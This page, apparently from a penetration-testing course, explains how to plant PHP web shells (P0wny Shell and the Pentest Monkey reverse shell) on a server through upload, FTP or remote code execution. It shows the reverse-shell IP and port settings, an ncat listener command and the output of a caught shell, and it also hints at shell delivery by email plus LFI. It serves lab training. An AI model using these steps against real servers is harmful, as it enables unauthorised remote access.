Skip to content

Web Based shells

If we can upload (or create) files on the remote server then a web based shell might be an option. By making use of the web interpreter to get a shell, this can help us work around restrictions on accessing the operating system, or tools like netcat not being available.

While web based shells tend to give us a more "user friendly" experience, not all of them are fully featured shells. Some may just be a wrapper around RCE, so things like environment variables, or interactive sessions (like text editors) may not be available to play with.

In this article, we will take a look at two useful web based shells. One will let us use PHP to create a reverse shell, the other gives us an interactive shell like webpage.

Getting a web based shell onto the remote system.

The first thing we need to do is get the shell onto the remote system. Broadly speaking we have 3 options here.

  • Upload the shell using web functionality
  • Upload the shell using another server function, like FTP1
  • Download the shell using RCE

Depending on how we get the shell onto the system, we will also need to find a way to actually run the thing. The examples here should let you run the shell directly. We will look at more complex methods later in the module.

P0wny Shell

The first web based shell we will look at is the P0wny Shell

P0wny Shell

P0wny Shell, gives us an interactive shell like interface on PHP based systems. While its not a proper TTY style shell, it does give us a quick and dirty way of running commands on a remote system. It also has some useful features like history, and file uploads / downloads.

Using P0wny Shell is easy2, "just" upload the shell to the remote, and navigate to its location.

Task

You can see the shell in action on the Shell Playground image. You have a couple of options

  • "Pre Uploaded" version, where you can play with the shell and test the functionality
  • Try to upload a copy of the shell yourself, then access it.

Pentest Monkey Shell

Another useful PHP based shell is the Pentest Monkey PHP Reverse Shell

Unlike P0wny shell this is not interactive, but instead lets us create a reverse shell using the PHP interpreter itself. This is useful when we don't have access to other OS functionality, or things like netcat, as we need nothing but PHP itself.

To get the pentest monkey shell working we do the following

  1. Download a copy of the shell from the Git Repo above
  2. READ the source (you don't just want to run files you download)

  3. As its a reverse shell, we need to tell it where to connect to. For this we need to modify the following lines, to add our IP, and whatever port we want to use.

    $ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
    4. Upload the shell to the remote server, and work out where it live

  4. We now need to setup a listener to catch the shell when it starts. For this we can use netcat, and whatever port you pick

    ncat -nvlp 4444

  5. Open the shell.php file you uploaded in the browser, if it looks like it hangs we are probably good to go. Otherwise, it usually gives you a useful error message. connection refused means you either forgot to start a listener, got the IP address wrong, or are being trolled by a firewall

  6. The netcat listener should now give you a connection to the remote machine.

    $ ncat -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.23.0.2.
Ncat: Connection from 172.23.0.2:52942.
Linux 9cca9d929fdd 5.4.80-2-lts #1 SMP Sat, 28 Nov 2020 15:11:01 +0000 x86_64 GNU/Linux
22:08:05 up 8 days,  1:36,  0 users,  load average: 0.16, 0.20, 0.17
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Task

You can see the shell in action on the Shell Playground image. You have a couple of options

  • "Pre Uploaded" version, where you can play with the shell and test the functionality
  • Try to upload a copy of the shell yourself, then access it.

Summary

In this article we have taken a brief look at two common web based shells. This covers two ends of the web shell spectrum, an interactive shell that allows us to run our commands in a webpage, and a reverse shell that will connect to a listener. While the examples given are PHP focused, similar shells are available for other languages.

For the lab you will get the chance to play with the different types of shell, and see how they work in action.

  1. Its also really cool to send a server an Email, then drop a shell via LFI 

  2. If there is no protection against uploads and viewing files 

Back to top